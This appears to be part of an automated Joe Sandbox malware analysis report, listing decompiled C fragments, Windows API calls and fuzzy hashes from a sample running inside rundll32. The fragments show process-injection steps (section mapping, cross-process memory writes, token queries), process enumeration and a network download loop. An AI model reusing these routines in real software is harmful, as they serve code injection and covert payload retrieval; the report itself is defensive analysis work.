                                          • Instruction Fuzzy Hash: 822119B190062CBBDF01AF98DC459DEBFBDEF08B40F144526F905E6210D7B19E459BA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • NtOpenProcess.NTDLL(?,00000400,?,?), ref: 00B71338
                                          • NtOpenProcessToken.NTDLL(?,00000008,?), ref: 00B7134B
                                          • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,?), ref: 00B71367
                                            • Part of subcall function 00B61C01: RtlAllocateHeap.NTDLL(00000000,00000001,00B71A23), ref: 00B61C0D
                                          • NtQueryInformationToken.NTDLL(?,00000001,00000000,?,?), ref: 00B71384
                                          • memcpy.NTDLL(?,00000000,0000001C), ref: 00B71391
                                          • NtClose.NTDLL(?), ref: 00B713A3
                                          • NtClose.NTDLL(?), ref: 00B713AD
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                          • String ID:
                                          • API String ID: 2575439697-0
                                          • Opcode ID: 3ea42ecee9ca9985f94d094edf19ed29e385e6fdee5404d52184cee37650ae7f
                                          • Instruction ID: 4bb9ca7af43d629777933fa89bf6a7cb5da4a3765504a47034537c5188a1cf70
                                          • Opcode Fuzzy Hash: 3ea42ecee9ca9985f94d094edf19ed29e385e6fdee5404d52184cee37650ae7f
                                          • Instruction Fuzzy Hash: F7213972910218BFDB01AF99CC45EDEBFBDEF08741F108066F909E6121D7719A549BA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • memcpy.NTDLL(?,?,00000004,?,?,00B6A412,00B6A412,00B6A412,?,?,?,00000000,00000000), ref: 00B5D101
                                            • Part of subcall function 00B5A5C0: GetModuleHandleA.KERNEL32(?,?,?,00B5D1BF,?,?,00000000,00000000), ref: 00B5A5FE
                                            • Part of subcall function 00B5A5C0: memcpy.NTDLL(?,00B7932C,00000018,?,?,?), ref: 00B5A67A
                                          • memcpy.NTDLL(?,?,00000018,?,?,00B6A412,00B6A412,00B6A412,?,?,?,00000000,00000000), ref: 00B5D14F
                                          • memcpy.NTDLL(?,00B53BC6,00000800,?,?,00000000,00000000), ref: 00B5D1D2
                                          • NtUnmapViewOfSection.NTDLL(000000FF,00000000,00000000,00000000), ref: 00B5D210
                                          • NtClose.NTDLL(00000000,00000000,00000000), ref: 00B5D237
                                            • Part of subcall function 00B646C8: GetModuleHandleA.KERNEL32(?,00000020,?,00008664,00001003,?,?,?,00B5D0A2,?,?,?,00000000,00000000), ref: 00B646ED
                                            • Part of subcall function 00B646C8: GetProcAddress.KERNEL32(00000000,?), ref: 00B6470F
                                            • Part of subcall function 00B646C8: GetProcAddress.KERNEL32(00000000,?), ref: 00B64725
                                            • Part of subcall function 00B646C8: GetProcAddress.KERNEL32(00000000,?), ref: 00B6473B
                                            • Part of subcall function 00B646C8: GetProcAddress.KERNEL32(00000000,?), ref: 00B64751
                                            • Part of subcall function 00B646C8: GetProcAddress.KERNEL32(00000000,?), ref: 00B64767
                                            • Part of subcall function 00B594A5: NtMapViewOfSection.NTDLL(00000000,000000FF,00B5DE51,00000000,00000000,00B5DE51,00000000,00000002,00000000,?,?,00000000,00B5DE51,000000FF,00000000), ref: 00B594D3
                                            • Part of subcall function 00B5C000: memcpy.NTDLL(?,?,00000000,?,?,00001003,00B6A412,00B6A412,?,?,?,00000000,00000000), ref: 00B5C074
                                            • Part of subcall function 00B5C000: memcpy.NTDLL(00000000,?,?), ref: 00B5C0DB
                                          • memset.NTDLL ref: 00B5D252
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: memcpy$AddressProc$HandleModuleSectionView$CloseUnmapmemset
                                          • String ID:
                                          • API String ID: 3674896251-0
                                          • Opcode ID: f6343b7b7c922e50db068a0d0754d48824d7acfcb32e253241d9f2e231d5ae26
                                          • Instruction ID: 6681df617d20785f45db0a8f2baba4d025f3c486151ff4e10c533beb98538fe3
                                          • Opcode Fuzzy Hash: f6343b7b7c922e50db068a0d0754d48824d7acfcb32e253241d9f2e231d5ae26
                                          • Instruction Fuzzy Hash: 8EA1597190060AEFDB21DF98C884BAEBBF5FF04305F1446E9E800A7251E735EA59DB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 70%
                                          			E04894CC6(void* __eax, void* __ecx) {
                                          				long _v8;
                                          				void* _v12;
                                          				void* _v16;
                                          				void _v20;
                                          				void* __esi;
                                          				void* _t36;
                                          				intOrPtr* _t37;
                                          				intOrPtr* _t39;
                                          				int _t43;
                                          				long _t45;
                                          				void* _t53;
                                          				long _t58;
                                          				void* _t59;
                                          
                                          				_t53 = __ecx;
                                          				_t59 = __eax;
                                          				_t58 = 0;
                                          				ResetEvent( *(__eax + 0x1c));
                                          				if(InternetReadFile( *(_t59 + 0x18),  &_v20, 4,  &_v8) != 0) {
                                          					L5:
                                          					if(_v8 == 0) {
                                          						 *((intOrPtr*)(_t59 + 0x30)) = 0;
                                          						L21:
                                          						return _t58;
                                          					}
                                          					 *0x489a174(0, 1,  &_v12); // executed
                                          					if(0 != 0) {
                                          						_t58 = 8;
                                          						goto L21;
                                          					}
                                          					_t36 = E04894DF6(0x1000);
                                          					_v16 = _t36;
                                          					if(_t36 == 0) {
                                          						_t58 = 8;
                                          						L18:
                                          						_t37 = _v12;
                                          						 *((intOrPtr*)( *_t37 + 8))(_t37);
                                          						goto L21;
                                          					}
                                          					_push(0);
                                          					_push(_v8);
                                          					_push( &_v20);
                                          					while(1) {
                                          						_t39 = _v12;
                                          						_t56 =  *_t39;
                                          						 *((intOrPtr*)( *_t39 + 0x10))(_t39);
                                          						ResetEvent( *(_t59 + 0x1c));
                                          						_t43 = InternetReadFile( *(_t59 + 0x18), _v16, 0x1000,  &_v8); // executed
                                          						if(_t43 != 0) {
                                          							goto L13;
                                          						}
                                          						_t58 = GetLastError();
                                          						if(_t58 != 0x3e5) {
                                          							L15:
                                          							E04894C73(_v16);
                                          							if(_t58 == 0) {
                                          								_t45 = E048956EC(_v12, _t59); // executed
                                          								_t58 = _t45;
                                          							}
                                          							goto L18;
                                          						}
                                          						_t58 = E04893A6F( *(_t59 + 0x1c), _t56, 0xffffffff);
                                          						if(_t58 != 0) {
                                          							goto L15;
                                          						}
                                          						_t58 =  *((intOrPtr*)(_t59 + 0x28));
                                          						if(_t58 != 0) {
                                          							goto L15;
                                          						}
                                          						L13:
                                          						_t58 = 0;
                                          						if(_v8 == 0) {
                                          							goto L15;
                                          						}
                                          						_push(0);
                                          						_push(_v8);
                                          						_push(_v16);
                                          					}
                                          				}
                                          				_t58 = GetLastError();
                                          				if(_t58 != 0x3e5) {
                                          					L4:
                                          					if(_t58 != 0) {
                                          						goto L21;
                                          					}
                                          					goto L5;
                                          				}
                                          				_t58 = E04893A6F( *(_t59 + 0x1c), _t53, 0xffffffff);
                                          				if(_t58 != 0) {
                                          					goto L21;
                                          				}
                                          				_t58 =  *((intOrPtr*)(_t59 + 0x28));
                                          				goto L4;
                                          			}

                                          APIs
                                          • ResetEvent.KERNEL32(?), ref: 04894CDC
                                          • InternetReadFile.WININET(?,?,00000004,?), ref: 04894CEB
                                          • GetLastError.KERNEL32 ref: 04894CF5
                                            • Part of subcall function 04893A6F: WaitForMultipleObjects.KERNEL32(00000002,04897B35,00000000,04897B35,?,?,?,04897B35,0000EA60), ref: 04893A8A
                                          • ResetEvent.KERNEL32(?), ref: 04894D6E
                                          • InternetReadFile.WININET(?,?,00001000,?), ref: 04894D7F
                                          • GetLastError.KERNEL32 ref: 04894D89
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: ErrorEventFileInternetLastReadReset$MultipleObjectsWait
                                          • String ID:
                                          • API String ID: 3290165071-0
                                          • Opcode ID: 40d4f98ea8419a432f4e88f994fc2dbee03f59495e4f9c745ef79659c26609df
                                          • Instruction ID: 64acd6f597f6ba15a6dbe90e9448e63b1b8f3fa5eff45eab67e08b5fa49a41ce
                                          • Opcode Fuzzy Hash: 40d4f98ea8419a432f4e88f994fc2dbee03f59495e4f9c745ef79659c26609df
                                          • Instruction Fuzzy Hash: E631923A604E04BFDF22AFA4DC44A6E77F9EF84A54F1C0A68E512D7190EA70FD428750
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00B65CCC
                                          • HeapCreate.KERNEL32(00000000,00400000,00000000), ref: 00B65CD9
                                          • NtQueryInformationThread.NTDLL(000000FE,00000009,?,00000004,?), ref: 00B65D65
                                          • GetModuleHandleA.KERNEL32(00000000), ref: 00B65D70
                                          • RtlImageNtHeader.NTDLL(00000000), ref: 00B65D79
                                          • RtlExitUserThread.NTDLL(00000000), ref: 00B65D8E
                                            • Part of subcall function 00B6199F: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00B65D07,?), ref: 00B619A7
                                            • Part of subcall function 00B6199F: GetVersion.KERNEL32 ref: 00B619B6
                                            • Part of subcall function 00B6199F: GetCurrentProcessId.KERNEL32 ref: 00B619D2
                                            • Part of subcall function 00B6199F: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 00B619EF
                                            • Part of subcall function 00B5685A: memcpy.NTDLL(00000000,?,?,?), ref: 00B568B9
                                            • Part of subcall function 00B53AEB: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,00000000,00000000,?,?,00B6A192), ref: 00B53B11
                                            • Part of subcall function 00B54345: GetModuleHandleA.KERNEL32(?,?,69B25F44,69B25F44,?,00B65886,00000000,00000000,69B25F44,00000000,?,?,00B5335A,?,00000000,?), ref: 00B54366
                                            • Part of subcall function 00B54345: GetProcAddress.KERNEL32(00000000,?), ref: 00B5437F
                                            • Part of subcall function 00B54345: OpenProcess.KERNEL32(00000400,00000000,69B25F44,?,69B25F44,69B25F44,?,00B65886,00000000,00000000,69B25F44,00000000,?,?,00B5335A,?), ref: 00B5439C
                                            • Part of subcall function 00B54345: IsWow64Process.KERNEL32(?,00000000,?,69B25F44,69B25F44,?,00B65886,00000000,00000000,69B25F44,00000000,?,?,00B5335A,?,00000000), ref: 00B543AD
                                            • Part of subcall function 00B54345: FindCloseChangeNotification.KERNEL32(?,?,00B65886,00000000,00000000,69B25F44,00000000,?,?,00B5335A,?,00000000,?), ref: 00B543C0
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Process$Module$CreateFileHandleOpenThreadTime$AddressChangeCloseCurrentEventExitFindHeaderHeapImageInformationNameNotificationProcQuerySystemUserVersionWow64memcpy
                                          • String ID:
                                          • API String ID: 2581485877-0
                                          • Opcode ID: fb5ce00df943cb3c050487706bb0b587b0e84287e81a5ff11a095409d67a8792
                                          • Instruction ID: 94345198f8f95792f8f1f39259028741f938535c006162c93cf1eaf2355d0518
                                          • Opcode Fuzzy Hash: fb5ce00df943cb3c050487706bb0b587b0e84287e81a5ff11a095409d67a8792
                                          • Instruction Fuzzy Hash: 1831D631900614AFC721AF64DC88EAE77F4FB44755F1045B8F65AEB191DB348D54CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 68%
                                          			E04896DB6() {
                                          				char _v264;
                                          				void* _v300;
                                          				void* _t5;
                                          				int _t8;
                                          				intOrPtr _t9;
                                          				int _t15;
                                          				void* _t17;
                                          
                                          				_t15 = 0;
                                          				_t5 = CreateToolhelp32Snapshot(2, 0); // executed
                                          				_t17 = _t5;
                                          				if(_t17 != 0) {
                                          					_t8 = Process32First(_t17,  &_v300);
                                          					while(_t8 != 0) {
                                          						_t9 =  *0x489a348; // 0x9ad5a8
                                          						_t2 = _t9 + 0x489bea8; // 0x73617661
                                          						_push( &_v264);
                                          						if( *0x489a12c() != 0) {
                                          							_t15 = 1;
                                          						} else {
                                          							_t8 = Process32Next(_t17,  &_v300);
                                          							continue;
                                          						}
                                          						L7:
                                          						FindCloseChangeNotification(_t17); // executed
                                          						goto L8;
                                          					}
                                          					goto L7;
                                          				}
                                          				L8:
                                          				return _t15;
                                          			}

                                          APIs
                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 04896DC6
                                          • Process32First.KERNEL32(00000000,?), ref: 04896DD9
                                          • Process32Next.KERNEL32(00000000,?), ref: 04896E05
                                          • FindCloseChangeNotification.KERNEL32(00000000), ref: 04896E14
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32
                                          • String ID:
                                          • API String ID: 3243318325-0
                                          • Opcode ID: bd1c4caafdf1701b781d5050357aaab8484799760f062c7fd4e9157be0abb7a4
                                          • Instruction ID: a13f8f4ca68ee0460900eef52c6f6994a7f88bf941c02a061a1a32c727dce0e1
                                          • Opcode Fuzzy Hash: bd1c4caafdf1701b781d5050357aaab8484799760f062c7fd4e9157be0abb7a4
                                          • Instruction Fuzzy Hash: 1AF0F672A009196ADF21A62ADC08EEF33ECDB85358F0C0A51FD05E2000FB34ED5586A2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,76D84EE0,00000000,00000000), ref: 00B5DE3A
                                            • Part of subcall function 00B594A5: NtMapViewOfSection.NTDLL(00000000,000000FF,00B5DE51,00000000,00000000,00B5DE51,00000000,00000002,00000000,?,?,00000000,00B5DE51,000000FF,00000000), ref: 00B594D3
                                          • memset.NTDLL ref: 00B5DE5E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Section$CreateViewmemset
                                          • String ID: @
                                          • API String ID: 2533685722-2766056989
                                          • Opcode ID: f947fb31bfdfe2961369438c790e1a574dcfabbf8a651ae8b251e28d28633cf0
                                          • Instruction ID: e27f583533061916c3852d7ddca434684278628c165cff111e72ff31b50cde4d
                                          • Opcode Fuzzy Hash: f947fb31bfdfe2961369438c790e1a574dcfabbf8a651ae8b251e28d28633cf0
                                          • Instruction Fuzzy Hash: BE213BB2D00209AFDB11DFA9C8819EEFBF9EB48350F1045A9E615F7210D770AA498B60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetProcAddress.KERNEL32(?,00000318), ref: 00B644CA
                                          • NtWow64QueryInformationProcess64.NTDLL(00000000,00000000,?,00000030,00000000), ref: 00B644E6
                                            • Part of subcall function 00B61C01: RtlAllocateHeap.NTDLL(00000000,00000001,00B71A23), ref: 00B61C0D
                                            • Part of subcall function 00B51C78: GetProcAddress.KERNEL32(?), ref: 00B51CA1
                                            • Part of subcall function 00B51C78: NtWow64ReadVirtualMemory64.NTDLL(?,?,?,?,?,00000000,?), ref: 00B51CC3
                                          • StrRChrA.SHLWAPI(00000018,00000000,0000005C,00000100,00000200), ref: 00B64650
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AddressProcWow64$AllocateHeapInformationMemory64Process64QueryReadVirtual
                                          • String ID:
                                          • API String ID: 3547194813-0
                                          • Opcode ID: e82c0e490ff935ff425be73ca1637d087dc1270d68e6a5d582f532facd057636
                                          • Instruction ID: 00b8e857f1de995afa0a4c8f4450d8d67f5d4d15ff21ba9a7784afdfae0972ac
                                          • Opcode Fuzzy Hash: e82c0e490ff935ff425be73ca1637d087dc1270d68e6a5d582f532facd057636
                                          • Instruction Fuzzy Hash: FF614171A0061AAFDF15DF94C880BEEB7F4FF09304F1045A9E909AB251DB74E954CBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • memset.NTDLL ref: 00B6F613
                                          • GetProcAddress.KERNEL32(?), ref: 00B6F63B
                                          • NtWow64QueryInformationProcess64.NTDLL(?,00000000,?,00000030,00000000,?,00001000,00000000), ref: 00B6F659
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AddressInformationProcProcess64QueryWow64memset
                                          • String ID:
                                          • API String ID: 2968673968-0
                                          • Opcode ID: 895dc4ac5a055073d0cf2463350efab55c04ac8b415e56f5877161c135f83b33
                                          • Instruction ID: e2bcfd89e2cdc66da50d96aa983d7a94f64be085700e88d954c68ddcfc236548
                                          • Opcode Fuzzy Hash: 895dc4ac5a055073d0cf2463350efab55c04ac8b415e56f5877161c135f83b33
                                          • Instruction Fuzzy Hash: DF117331A0411AAFDB10DB54DC49FA97BE9EB45700F054069FD08EB2A0DB74ED05CB70
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • NtAllocateVirtualMemory.NTDLL(00B57A68,00000000,00000000,00B57A68,00003000,00000040), ref: 00B6ADCF
                                          • RtlNtStatusToDosError.NTDLL(00000000), ref: 00B6ADD6
                                          • SetLastError.KERNEL32(00000000), ref: 00B6ADDD
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Error$AllocateLastMemoryStatusVirtual
                                          • String ID:
                                          • API String ID: 722216270-0
                                          • Opcode ID: 585d0d89600aa7f1f04b8e0bcabd5b971c6ef0b789e1cc5c79c1b7bfea11dfb3
                                          • Instruction ID: 799d626cebd668526b3b8abc7b8a70b1892612ff393402a81babfac7f83f9309
                                          • Opcode Fuzzy Hash: 585d0d89600aa7f1f04b8e0bcabd5b971c6ef0b789e1cc5c79c1b7bfea11dfb3
                                          • Instruction Fuzzy Hash: 10F0FE71521309FBEB05CBD5DD09BAE76BCEB14346F104058B604E7080EBB4AB44DB65
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • NtWriteVirtualMemory.NTDLL(00000318,00000000,00000000,00001003,00B57B0A,00000000,?,00B57B0A,00001003,00000000,00000000,00000318,00000020,?,00010003,00001003), ref: 00B6B646
                                          • RtlNtStatusToDosError.NTDLL(C0000002), ref: 00B6B655
                                          • SetLastError.KERNEL32(00000000,?,00B57B0A,00001003,00000000,00000000,00000318,00000020,?,00010003,00001003,?,00000318,00000008), ref: 00B6B65C
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Error$LastMemoryStatusVirtualWrite
                                          • String ID:
                                          • API String ID: 1089604434-0
                                          • Opcode ID: 56cb82cd8f12da10e574d5d01bc77b93918209be51c48a5e07dca6f98bb2609b
                                          • Instruction ID: 7a4d176695ec5dab6cce3cb998b3f59a4c1e37b4d0582dce4c81c02593f3ca56
                                          • Opcode Fuzzy Hash: 56cb82cd8f12da10e574d5d01bc77b93918209be51c48a5e07dca6f98bb2609b
                                          • Instruction Fuzzy Hash: 5DE0BF3320021AABCF015FE9EC08D9ABBA9FB19751B008461BE15D3131DB35D9B1ABE0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 72%
                                          			E048925D7(intOrPtr* __eax, void** _a4) {
                                          				int _v12;
                                          				void* _v16;
                                          				void* _v20;
                                          				void* _v24;
                                          				int _v28;
                                          				int _v32;
                                          				intOrPtr _v36;
                                          				int _v40;
                                          				int _v44;
                                          				void* _v48;
                                          				void* __esi;
                                          				long _t34;
                                          				void* _t39;
                                          				void* _t47;
                                          				intOrPtr* _t48;
                                          
                                          				_t48 = __eax;
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				_v24 =  *((intOrPtr*)(__eax + 4));
                                          				_v16 = 0;
                                          				_v12 = 0;
                                          				_v48 = 0x18;
                                          				_v44 = 0;
                                          				_v36 = 0x40;
                                          				_v40 = 0;
                                          				_v32 = 0;
                                          				_v28 = 0;
                                          				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
                                          				if(_t34 < 0) {
                                          					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
                                          				} else {
                                          					 *_t48 = _v16;
                                          					_t39 = E04893A9C(_t48,  &_v12); // executed
                                          					_t47 = _t39;
                                          					if(_t47 != 0) {
                                          						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
                                          					} else {
                                          						memset(_v12, 0, _v24);
                                          						 *_a4 = _v12;
                                          					}
                                          				}
                                          				return _t47;
                                          			}

                                          APIs
                                          • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,76D84EE0,00000000,00000000,0489759F), ref: 04892634
                                            • Part of subcall function 04893A9C: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,04892649,00000002,00000000,?,?,00000000,?,?,04892649,00000000), ref: 04893AC9
                                          • memset.NTDLL ref: 04892656
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: Section$CreateViewmemset
                                          • String ID:
                                          • API String ID: 2533685722-0
                                          • Opcode ID: 599b9daad8f68b1fbb65ca1a3266e3e7e6caa9dce62654c94354c0a334a3d922
                                          • Instruction ID: 8503279221bd498887d76995600dbc5055ca8f69225f26d1813de19ed6ceb339
                                          • Opcode Fuzzy Hash: 599b9daad8f68b1fbb65ca1a3266e3e7e6caa9dce62654c94354c0a334a3d922
                                          • Instruction Fuzzy Hash: C1213BB5D0060DAFDB11DFA9C8849DEFBF9FB48344F148969E505F3610D730AA448BA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetProcAddress.KERNEL32(?), ref: 00B51CA1
                                          • NtWow64ReadVirtualMemory64.NTDLL(?,?,?,?,?,00000000,?), ref: 00B51CC3
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AddressMemory64ProcReadVirtualWow64
                                          • String ID:
                                          • API String ID: 752694512-0
                                          • Opcode ID: 3effa3e348bd43c66f1db253c63b614c617575980050713d8db325cc1560d8bf
                                          • Instruction ID: a9a64c26c45c288efe64cfe43344e1a8ba525bf397784e59acb198138617af7d
                                          • Opcode Fuzzy Hash: 3effa3e348bd43c66f1db253c63b614c617575980050713d8db325cc1560d8bf
                                          • Instruction Fuzzy Hash: FAF06D75500109FFCB028F89DC44D9EBBFAEB883007504999F908D7220DB32E9A1DB10
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 68%
                                          			E04893A9C(void** __esi, PVOID* _a4) {
                                          				long _v8;
                                          				void* _v12;
                                          				void* _v16;
                                          				long _t13;
                                          
                                          				_v16 = 0;
                                          				asm("stosd");
                                          				_v8 = 0;
                                          				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
                                          				if(_t13 < 0) {
                                          					_push(_t13);
                                          					return __esi[6]();
                                          				}
                                          				return 0;
                                          			}

                                          APIs
                                          • NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,04892649,00000002,00000000,?,?,00000000,?,?,04892649,00000000), ref: 04893AC9
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: SectionView
                                          • String ID:
                                          • API String ID: 1323581903-0
                                          • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                          • Instruction ID: 3c78cb1c4191e60aa0436619ba71b363e2355fb6121d485e501a2ebd1e0428be
                                          • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                          • Instruction Fuzzy Hash: 26F082B5A0060CBFDB119FA4CC84C9FBBFCEB48354B104E39B552E1090D630AE488B60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • NtMapViewOfSection.NTDLL(00000000,000000FF,00B5DE51,00000000,00000000,00B5DE51,00000000,00000002,00000000,?,?,00000000,00B5DE51,000000FF,00000000), ref: 00B594D3
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: SectionView
                                          • String ID:
                                          • API String ID: 1323581903-0
                                          • Opcode ID: 2cd136b18fd47c29f94374b8f148c9a9c123cd50275110905b50dafc155aad11
                                          • Instruction ID: c7c0a15c38bade611ca51baa02d9cac0888a48c7a1ce48261854347b4c4c23b6
                                          • Opcode Fuzzy Hash: 2cd136b18fd47c29f94374b8f148c9a9c123cd50275110905b50dafc155aad11
                                          • Instruction Fuzzy Hash: 73F0FEB690020CFFEB119FA5CC85D9FBBBDEB48345B108869F542D1150D2319E199B60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • NtQueryInformationProcess.NTDLL(00000000,?,00000018,00000000,00B79420), ref: 00B65DB4
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: InformationProcessQuery
                                          • String ID:
                                          • API String ID: 1778838933-0
                                          • Opcode ID: 7a12e46de81385406117bb51a9dc433ccdf37569311cf95d112ce140b254f5ac
                                          • Instruction ID: 026649a44ff679f14298783d1ea44f99903341458e3648d7859c6fd2f99a4388
